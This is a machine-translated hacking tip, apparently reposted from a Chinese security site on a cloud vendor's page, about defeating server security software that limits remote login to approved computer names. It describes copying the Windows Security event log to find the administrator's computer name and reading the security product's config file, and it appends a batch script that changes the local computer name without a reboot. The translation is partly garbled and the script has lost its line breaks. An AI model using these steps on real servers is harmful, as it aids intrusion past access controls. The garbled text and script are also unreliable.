Break through some security software to restrict remote login to computer names

Source: Internet
Author: User

Break through some security software to restrict remote login to computer names

Problem

Some server security software allows administrators to specify the names of computers that can be logged on (the names of the computers on which the Administrator computers are located). If the names of the computers that are logged on are not administrator, the server security software will intercept the login behavior of the other party. At first glance, this method is quite safe, but it can only stop the intruders of Tom.

Solution

1. After improving your permissions, obtain the logon records of the remote server to know the Administrator's computer name.

copy C:\WINDOWS\system32\config\Secevent.evt c:\windows\temp\Secevent.evt

After the download, open the search in Notepad: r d p-T c p

At the same time, I have provided you with something that can modify the name of your local computer without restarting it, so that the passer can easily complete the Penetration Process, it is difficult to forward the Intranet port, but you have to restart to modify the computer name. :)

2. Through Reverse thinking, we can know that the server security software needs to save the Administrator's computer name to know what its computer name is and then verify it. Then we can search the configuration file of the server security software to obtain the Administrator's computer name.

For example, the configuration of a dog:

C:\Program Files\SafedogServer\SafeDogGuardCenter\ProGuardData.ini

If the obtained data is encrypted, we can build a local server security software for decryption. You know.

Appendix: script for modifying the computer name without restarting

@ Echo offecho AppLife. netset/p name = enter your computer name: reg add "HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ ComputerName \ ActiveComputerName"/v ComputerName/t reg_sz/d % name %/f> nul 2> nulreg add "HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Tcpip \ Parameters "/v" NV Hostname "/t reg_sz/d % name %/f> nul 2> nulreg add" HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Tcpip \ parameters "/v Hostname/t reg_sz/d % name %/f> nul 2> nulecho. echoecho. echo AppLife. netset/p work1 = enter your workgroup Name: wmic computersystem where Name = "% COMPUTERNAME %" call JoinDomainOrWorkgroup Name = "% work1 %" echo: pause> nulecho

91ri.org note: the two ideas in this article are old ideas. In practice, you may find that they are no longer valid, but penetration is flexible and diverse, you may be able to develop better skills based on the above ideas. We hope to bring your JADE: P

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.